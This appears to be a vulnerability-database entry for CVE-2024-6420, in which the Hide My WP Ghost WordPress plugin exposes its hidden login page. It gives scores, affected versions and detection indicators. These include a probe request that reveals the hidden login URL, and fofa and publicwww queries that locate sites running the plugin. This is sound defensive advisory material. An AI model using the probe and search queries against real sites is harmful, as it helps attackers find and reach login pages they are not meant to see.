cbcvebase.
CVE-2024-6420
published 2024-07-23

CVE-2024-6420: The Hide My WP Ghost WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an…

PriorityP260high8.6CVSS 3.1
AVNACLPRNUINSUCHILAL
EXPLOIT
EPSS
1.80%
75.8th percentile
The Hide My WP Ghost WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.

Affected

1 ranges
VendorProductVersion rangeFixed in
wppluginshide_my_wp_ghost< 5.2.025.2.02

Detection & IOCsextracted from sources · hover to see the quote

url{{BaseURL}}/?gf_page=randomstring
path/wp-content/plugins/hide-my-wp
other%2F%3Fgf_page%3Drandomstring&reauth=1
otherfofa-query: body="/wp-content/plugins/hide-my-wp"
otherpublicwww-query: "/wp-content/plugins/hide-my-wp/"
  • Detect exploitation attempt: send a GET request to /?gf_page=randomstring and check if the Location header contains the encoded redirect path '%2F%3Fgf_page%3Drandomstring&reauth=1' (indicating the hidden login page URL was leaked via auth_redirect), while confirming the redirect does NOT go to the default 'wp-login.php'.
  • Identify vulnerable WordPress installations by checking for the presence of '/wp-content/plugins/hide-my-wp' in the page body, confirming the Hide My WP Ghost plugin is active.
  • A successful exploit results in a redirect Location header that does NOT contain 'wp-login.php', meaning the hidden (custom) login page URL has been disclosed to an unauthenticated visitor.
  • ·The Nuclei template uses a two-step flow: step 1 confirms the plugin is present (internal matcher), and step 2 triggers the auth_redirect bypass. Both conditions must be true for a positive detection.
  • ·The vulnerability only affects Hide My WP Ghost versions strictly before 5.2.02; sites running 5.2.02 or later are not affected.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.